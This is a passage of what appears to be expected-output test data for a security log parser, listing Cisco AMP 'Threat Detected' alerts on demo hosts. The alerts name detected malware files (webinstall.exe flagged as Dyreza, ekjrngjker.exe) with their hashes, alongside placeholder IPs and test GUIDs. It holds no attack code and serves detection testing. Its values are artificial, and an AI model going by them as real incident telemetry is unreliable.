"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 222186, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:56.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668365670547487", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 428000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668365670547000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 223505, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:55.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668361375580188", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 616000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668361375580000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 227473, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:52.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258629159616595", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 649000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258629159617000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 228792, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:40.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258577620009042", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 637000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258577620009000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 230111, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:28.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258526080401489", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 609000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258526080401000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 231430, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:16.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258474540793936", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 987000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258474540794000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 232749, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:15:04.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258423001186383", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 959000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258423001186000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 234068, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:55.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668103677542427", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 470000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668103677542000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 235387, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:54.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533668099382575128", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 696000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533668099382575000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 239357, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:52.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258371461578830", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 947000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258371461579000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 240676, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:41.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258324216938573", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 403000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258324216938000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 241995, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:29.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258272677331020", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 298000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258272677331000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 243314, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:17.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258221137723467", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 270000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258221137723000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 244633, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:14:05.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258169598115914", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 648000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258169598116000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", - "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "file.name": "webinstall.exe", - "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", - "fileset.name": "amp", - "host.hostname": "Demo_Dyre", - "host.name": "Demo_Dyre", - "input.type": "log", - "log.offset": 245952, - "related.hash": [ - "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", - "e9d8c15e7d18678dd41771f72ed6693c", - "ec80314ae4a2817be806b7ae27dbdb31a88226a0" - ], - "related.hosts": [ - "Demo_Dyre" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:54.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "63:5f:47:2b:89:91" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "W32.File.MalParent", - "cisco.amp.detection_id": "6533667841684537367", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "63:5f:47:2b:89:91" - ], - "cisco.amp.timestamp_nanoseconds": 532000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6533667841684537000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", - "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", - "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "file.name": "ekjrngjker.exe", - "file.path": "\\\\?\\C:\\ekjrngjker.exe", - "fileset.name": "amp", - "host.hostname": "Demo_AMP_Threat_Audit", - "host.name": "Demo_AMP_Threat_Audit", - "host.os.family": "windows", - "host.os.platform": "windows", - "host.user.name": "user@testdomain.com", - "input.type": "log", - "log.offset": 247271, - "related.hash": [ - "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", - "b99e0a8c56f963246b6464b9fffbf7a2", - "b024546a49bad1bd60fccef0a5d11b55f9a442c4" - ], - "related.hosts": [ - "Demo_AMP_Threat_Audit" - ], - "related.ip": [ - "8.8.8.8", - "10.10.10.10" - ], - "related.user": [ - "user@testdomain.com" - ], - "service.type": "cisco", - "tags": [ - "cisco-amp", - "forwarded" - ] - }, - { - "@timestamp": "2021-01-15T10:13:53.000Z", - "cisco.amp.computer.active": true, - "cisco.amp.computer.connector_guid": "test_connector_guid", - "cisco.amp.computer.external_ip": "8.8.8.8", - "cisco.amp.computer.network_addresses": [ - { - "ip": "10.10.10.10", - "mac": "23:d5:92:eb:f8:9b" - } - ], - "cisco.amp.connector_guid": "test_connector_guid", - "cisco.amp.detection": "GenericKD:Dyreza-tpd", - "cisco.amp.detection_id": "6176258118058508361", - "cisco.amp.event_type_id": 1090519054, - "cisco.amp.file.disposition": "Malicious", - "cisco.amp.group_guids": [ - "test_group_guid" - ], - "cisco.amp.related.mac": [ - "23:d5:92:eb:f8:9b" - ], - "cisco.amp.timestamp_nanoseconds": 636000000, - "event.action": "Threat Detected", - "event.category": [ - "file", - "malware" - ], - "event.dataset": "cisco.amp", - "event.id": 6176258118058508000, - "event.kind": "alert", - "event.module": "cisco", - "event.severity": 2, - "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", - 